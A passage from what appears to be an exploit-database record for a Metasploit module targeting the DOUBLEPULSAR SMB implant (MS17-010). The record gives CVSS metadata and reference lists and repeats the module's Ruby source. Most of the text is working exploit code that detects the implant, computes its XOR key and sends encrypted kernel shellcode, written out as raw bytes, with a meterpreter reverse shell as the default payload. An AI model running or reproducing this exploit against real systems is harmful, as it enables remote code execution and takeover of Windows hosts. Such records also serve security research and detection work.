to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T22:41:50", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "5d3ff3f784b28b3897cd90e5bee5ca61", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-14T08:21:09", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-33895"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-14T08:21:09", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-14T08:21:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": 
"https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 
'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = 